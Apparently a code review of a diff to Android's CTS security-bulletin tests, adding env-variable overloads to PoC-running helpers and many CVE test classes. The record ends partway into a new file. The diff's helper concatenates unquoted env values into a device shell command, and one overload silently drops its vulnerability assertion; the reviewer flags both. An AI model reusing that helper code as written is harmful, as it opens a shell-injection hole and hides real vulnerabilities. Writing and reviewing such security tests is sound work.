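Review bot: The Javadoc on the new `runPoc` overload was copied from the shorter one and still says the method "ignores any of its output", although it takes a `receiver` and returns the exit status; it also has no `@return` and does not say how `envVars` is applied. I would reword the summary to "Pushes and runs a binary with arguments and environment variables on the selected device" and add `@param envVars environment variables prefixed to the command as NAME=value, or null for none` and `@return the exit status of the poc`. The changed `pushFile(pocName + "_sts", remoteFile)` line alters the local artifact name for every caller, so a short comment stating the `_sts` naming convention belongs next to it. The method body continues outside this hunk.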
@@ -173,11 +194,26 @@ public class AdbUtils { arguments = ""; } + String env = ""; + if (envVars != null) { + StringBuilder sb = new StringBuilder(); + for (Map.Entry<String, String> entry : envVars.entrySet()) { + sb + .append(entry.getKey().trim()) + .append('=') + .append(entry.getValue().trim()) + .append(' '); + } + env = sb.toString(); + CLog.i("Running poc '%s' with env variables '%s'", pocName, env); + } + // since we have to return the exit status AND the poc stdout+stderr we redirect the exit // status to a file temporarily String exitStatusFilepath = TMP_PATH + "exit_status"; runCommandLine("rm " + exitStatusFilepath, device); // remove any old exit status - device.executeShellCommand(TMP_PATH + pocName + " " + arguments + + device.executeShellCommand( + env + TMP_PATH + pocName + " " + arguments + "; echo $? > " + exitStatusFilepath, // echo exit status to file receiver, timeout, TimeUnit.SECONDS, 0); @@ -411,7 +447,21 @@ public class AdbUtils { */ public static int runPocGetExitStatus(String pocName, String arguments, ITestDevice device, int timeout) throws Exception { - return runPoc(pocName, device, timeout, arguments, null); + return runPocGetExitStatus(pocName, arguments, null, device, timeout); + } + + /** + * Pushes and runs a binary to the device and returns the exit status. + * @param pocName name of the poc binary + * @param arguments input arguments for the poc + * @param envVars run the poc with environment variables + * @param device device to be run on + * @param timeout time to wait for output in seconds + */ + public static int runPocGetExitStatus( + String pocName, String arguments, Map<String, String> envVars, + ITestDevice device, int timeout) throws Exception { + return runPoc(pocName, device, timeout, arguments, envVars, null); } /** 
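Review bot: The `env` prefix is built by concatenating each key and value, trimmed but otherwise unmodified, into the string passed to `device.executeShellCommand`, so a value that contains a space, quote, `;` or `$` changes the command the device shell runs instead of being passed as data, and a null value throws from `.trim()`. Inputs come from test code today, but this is a shared helper; the name should be validated and the value quoted before it is spliced in. The sketch below uses `assertTrue` rather than `IllegalArgumentException` because a caller later in this file catches that exception type around the PoC run.

```java
        String env = "";
        if (envVars != null) {
            StringBuilder sb = new StringBuilder();
            for (Map.Entry<String, String> entry : envVars.entrySet()) {
                String key = String.valueOf(entry.getKey()).trim();
                assertTrue("invalid env var name: " + key,
                        key.matches("[A-Za-z_][A-Za-z0-9_]*"));
                // Single-quote the value so the device shell treats it as one literal word.
                String value = String.valueOf(entry.getValue()).trim().replace("'", "'\\''");
                sb.append(key).append("='").append(value).append("' ");
            }
            env = sb.toString();
            CLog.i("Running poc '%s' with env variables '%s'", pocName, env);
        }
        // … unchanged: exit-status file handling and executeShellCommand call …
```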
@@ -434,8 +484,22 @@ public class AdbUtils { */ public static void runPocAssertExitStatusNotVulnerable(String pocName, String arguments, ITestDevice device, int timeout) throws Exception { + runPocGetExitStatus(pocName, arguments, null, device, timeout); + } + + /** + * Pushes and runs a binary and asserts that the exit status isn't 113: vulnerable. + * @param pocName name of the poc binary + * @param arguments input arguments for the poc + * @param envVars run the poc with environment variables + * @param device device to be ran on + * @param timeout time to wait for output in seconds + */ + public static void runPocAssertExitStatusNotVulnerable( + String pocName, String arguments, Map<String, String> envVars, + ITestDevice device, int timeout) throws Exception { assertTrue("PoC returned exit status 113: vulnerable", - runPocGetExitStatus(pocName, arguments, device, timeout) != 113); + runPocGetExitStatus(pocName, arguments, envVars, device, timeout) != 113); } /** 
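Review bot: The four-argument `runPocAssertExitStatusNotVulnerable` no longer asserts anything: its new body is `runPocGetExitStatus(pocName, arguments, null, device, timeout);`, which runs the binary and discards the exit status, while the `assertTrue(... != 113)` check now exists only in the new `envVars` overload. Every test that calls the short form will therefore pass even when the PoC exits with 113, which silently disables the vulnerability verdict for those tests. The short form should delegate to the asserting overload instead: `runPocAssertExitStatusNotVulnerable(pocName, arguments, null, device, timeout);`.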
@@ -579,8 +643,33 @@ public class AdbUtils { public static void runPocAssertNoCrashesNotVulnerable(String binaryName, String arguments, String inputFiles[], String inputFilesDestination, ITestDevice device, String processPatternStrings[]) throws Exception { + runPocAssertNoCrashesNotVulnerable(binaryName, arguments, null, + inputFiles, inputFilesDestination, device, processPatternStrings); + } + + /** + * Runs the poc binary and asserts following 3 conditions. + * 1. There are no security crashes in the binary. + * 2. There are no security crashes that match the expected process pattern. + * 3. The exit status isn't 113 (Code 113 is used to indicate the vulnerability condition). + * + * @param binaryName name of the binary + * @param arguments arguments for running the binary + * @param envVars run the poc with environment variables + * @param inputFiles files required as input + * @param inputFilesDestination destination directory to which input files are + * pushed + * @param device device to be run on + * @param processPatternStrings a Pattern string (other than binary name) to match the crash + * tombstone process + */ + public static void runPocAssertNoCrashesNotVulnerable( + String binaryName, String arguments, Map<String, String> envVars, + String inputFiles[], String inputFilesDestination, ITestDevice device, + String... processPatternStrings) throws Exception { pocConfig testConfig = new pocConfig(binaryName, device); testConfig.arguments = arguments; + testConfig.envVars = envVars; if (inputFiles != null) { testConfig.inputFiles = Arrays.asList(inputFiles); @@ -617,7 +706,7 @@ public class AdbUtils { runCommandLine("logcat -c", testConfig.device); try { runPocAssertExitStatusNotVulnerable(testConfig.binaryName, testConfig.arguments, - testConfig.device, TIMEOUT_SEC); + testConfig.envVars, testConfig.device, TIMEOUT_SEC); } catch (IllegalArgumentException e) { /* * Since 'runPocGetExitStatus' method raises IllegalArgumentException upon 
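Review bot: The Javadoc of the new `envVars` overload of `runPocAssertNoCrashesNotVulnerable` does not say that `envVars` may be null, although the older overload in this same hunk passes `null` for it. I would write the tag as `@param envVars environment variables to set for the poc process, or null for none`. The parameter list also mixes `String inputFiles[]` with `String... processPatternStrings`; `String[] inputFiles` would follow the usual Java form. The method body continues past the end of the hunk.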
@@ -686,5 +775,9 @@ public class AdbUtils { } catch (JSONException e) {} } fail(error.toString()); - } + } + + public static void assumeHasNfc(ITestDevice device) throws DeviceNotAvailableException { + assumeTrue("nfc not available on device", device.hasFeature("android.hardware.nfc")); + } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java new file mode 100644 index 00000000000..e6e10156a09 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java 
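Review bot: `AdbUtils.assumeHasNfc` is added without any Javadoc, yet this commit puts it in front of a dozen security tests, where a false result turns the test into an assumption failure rather than a pass or fail. A short header would make that explicit, e.g. `/** Skips the calling test (JUnit assumption failure) when the device does not report the android.hardware.nfc feature. */`. Because a device that does not report the feature is never exercised by those PoCs, the skip should be visible in the result report rather than counted as a pass; worth confirming how the runner records it. The literal `"android.hardware.nfc"` would also read better as a named constant.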
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.compatibility.common.util.CrashUtils;
+import static org.junit.Assume.assumeFalse;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2016_2182 extends SecurityTestCase {
+
+ /**
+ * b/32096880
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2017-03")
+ @Test
+ public void testPocCVE_2016_2182() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.conscrypt"));
+ String binaryName = "CVE-2016-2182";
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.checkMinAddress(false);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java
new file mode 100644
index 00000000000..9d032cd77ef
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java
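Review bot: In `CVE_2016_2182.java`, `testConfig.config.checkMinAddress(false)` switches off a crash-filter setting in `testPocCVE_2016_2182` without saying why, so a later maintainer cannot tell whether the test depends on it to detect the bug. A one-line comment above the call stating the reason would fix that, for example `// fault address for this bug is expected to be low; keep such crashes in the result`, if that is the intent (I am inferring it from the method name). The import block also has no blank line after `package` and does not group static and regular imports, unlike the other test files added in this commit.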
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2016_8332 extends SecurityTestCase {
+
+ /**
+ * b/37761553
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2017-06")
+ @Test
+ public void testPocCVE_2016_8332() throws Exception {
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2016-8332", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java
new file mode 100644
index 00000000000..ab83ce38c9f
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import static org.junit.Assert.*;
+import static org.junit.Assume.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2017_13194 extends SecurityTestCase {
+
+ /**
+ * b/64710201
+ * Vulnerability Behaviour: SIGSEGV in media.codec
+ */
+ @SecurityTest(minPatchLevel = "2018-01")
+ @Test
+ public void testPocCVE_2017_13194() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.media.swcodec"));
+ pocPusher.only64();
+ String processPatternStrings[] = {"media\\.codec", "omx@\\d+?\\.\\d+?-service"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-13194", null, getDevice(),
+ processPatternStrings);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java
new file mode 100644
index 00000000000..6f1c03f9b60
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java
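Review bot: `CVE_2017_13194.java` pulls in `import static org.junit.Assert.*;` and `import static org.junit.Assume.*;`, but the only static member the test uses is `assumeFalse`. I would replace both wildcard lines with `import static org.junit.Assume.assumeFalse;`, as `CVE_2016_2182.java` in this commit does, so that an unqualified `assert…`/`assume…` call cannot resolve to something unintended later. `String processPatternStrings[]` would also read better as `String[] processPatternStrings`.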
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9558 extends SecurityTestCase {
+
+ /**
+ * b/112161557
+ * Vulnerability Behaviour: SIGABRT in self
+ */
+ @SecurityTest(minPatchLevel = "2018-12")
+ @Test
+ public void testPocCVE_2018_9558() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ String binaryName = "CVE-2018-9558";
+ String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.setSignals(signals);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java
new file mode 100644
index 00000000000..ad88bb77eb1
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9561 extends SecurityTestCase {
+
+ /**
+ * b/111660010
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2018_9561() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9561", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java
new file mode 100644
index 00000000000..8f8b53de0d3
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9563 extends SecurityTestCase {
+
+ /**
+ * b/114237888
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2018_9563() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9563", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java
new file mode 100644
index 00000000000..5d68ce6305e
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9584 extends SecurityTestCase {
+
+ /**
+ * b/114047681
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-01")
+ @Test
+ public void testPocCVE_2018_9584() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9584", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java
new file mode 100644
index 00000000000..f5d19e4cc3a
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9585 extends SecurityTestCase {
+
+ /**
+ * b/117554809
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-01")
+ @Test
+ public void testPocCVE_2018_9585() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9585", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java
new file mode 100644
index 00000000000..718878cc79c
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2007 extends SecurityTestCase {
+
+ /**
+ * b/120789744
+ * Vulnerability Behaviour: EXIT_VULNERABLE (113)
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2019_2007() throws Exception {
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2007", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java
new file mode 100644
index 00000000000..d2f60c79f9a
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2013 extends SecurityTestCase {
+
+ /**
+ * b/120497583
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2019_2013() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2013", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java
new file mode 100644
index 00000000000..c70f560cfbe
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2014 extends SecurityTestCase {
+
+ /**
+ * b/120499324
+ * Vulnerability Behaviour: SIGABRT in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2019_2014() throws Exception {
+ pocPusher.only64();
+ String binaryName = "CVE-2019-2014";
+ String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.setSignals(signals);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java
new file mode 100644
index 00000000000..cd61170fc6a
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2019 extends SecurityTestCase {
+
+ /**
+ * b/115635871
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2019_2019() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2019", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java
new file mode 100644
index 00000000000..0ac90e48244
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2035 extends SecurityTestCase {
+
+ /**
+ * b/122320256
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-04")
+ @Test
+ public void testPocCVE_2019_2035() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2035", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java
new file mode 100644
index 00000000000..2619ed97cdf
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2040 extends SecurityTestCase {
+
+ /**
+ * b/122316913
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-04")
+ @Test
+ public void testPocCVE_2019_2040() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2040", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java
new file mode 100644
index 00000000000..6072d129a74
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
